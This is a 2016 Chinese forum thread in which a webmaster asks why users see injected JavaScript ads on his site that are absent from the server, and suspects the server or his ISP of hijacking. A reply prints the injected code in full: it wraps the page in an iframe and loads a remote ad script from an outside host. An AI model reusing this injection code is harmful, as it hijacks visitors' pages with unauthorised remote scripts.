网站被黑了吗，在本地浏览浏览有多出的脚本，但实际服务器上该文件没有这些代码，这是怎么回事呢？

goodgame365 2016-03-25 03:27:35

我的网站最近有用户反映说，页面播放不了，脚本出错，但我在本地测试正常，后来远程上有问题的用户电脑一看，

发现我在这页面JS形式调用本站的aspx文件,被改写了，末尾多出了一代疑似木马广告的JS

马上进服务器查看这个aspx文件，但却没发现该文件有多出在浏览器出现的代码

所以以为是他家电脑的问题，就放下排查了。

但今天我突然发现打开这个播放页面时，也弹出JS脚本错误

刷新一两次，就没再提示错误，恢复正常了，感觉是被人植入广告代码了

我立马意识到问题严重性，感觉是我服务器的问题，但又知是哪里出问题

是服务器被劫持，还是本地网络的电信营运商劫持了，因为这个用户跟我是同个省份的！
请高人指点！

...全文

205 4 打赏收藏转发到动态举报

写回复

用AI写文章

4 条回复

切换为时间正序

请发表友善的回复…

发表回复

goodgame365 2016-03-25

打赏
举报

这个代码出现后，发现右下角弹出广告，而广告内容竟然跟我顶部放置的百度广告内容一样，难道是百度联盟的JS有问题？

goodgame365 2016-03-25

打赏
举报

早上起来打开，发现又出现了，但这次情况不同，是整个播放页面，而不是JS调用的那个aspx文件了在浏览器右键查看源码发现，原来正常的脚本不见了，是一段疑似木马的代码如下！ ----------------------------

<html><head><title></title><body style="overflow-x:hidden;overflow-y:hidden;margin:0px;padding:0px"><script type="text/javascript">var u=document.URL,ua= navigator.userAgent.toLowerCase(),url="";if(u.indexOf("#")>-1){url=u.split("#")[0]+(~u.indexOf("?")?"&":"?")+(new Date().getTime())+"#"+(u.split("#").length>1?u.split("#")[1]:"")}else{url=u+(~u.indexOf("?")?"&":"?")+(new Date().getTime())}if(ua.indexOf('android')>-1||ua.indexOf('phone')>-1||ua.indexOf('linux')>-1){document.location.href=url;}else{document.write('<iframe src="'+url+'" name="'+(new Date()).getTime()+'" width="100%" height="100%" frameborder="0" border="0" marginwidth="0" marginheight="0"></iframe>');(function(){if(!document.body)return setTimeout(arguments.callee,50);var e=document.createElement("script");e.type="text/javascript",e.text='_guanggao_pub= "8e23dcd3d8fd2039a9f4";',e.text+='_guanggao_slot= "52b7a30ccda080d8584c";',document.body.insertBefore(e,document.body.children.item(0));var e=document.createElement("script");e.src="http://mm.tiansin.com/js/8e23dcd3d8fd2039a9f4",e.type="text/javascript",document.body.insertBefore(e,document.body.children.item(0))})();}</script></body></html>